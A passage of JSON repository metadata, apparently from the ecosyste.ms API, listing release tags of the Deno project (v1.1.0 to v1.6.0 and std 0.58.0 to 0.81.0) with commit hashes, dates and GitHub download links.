gs/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno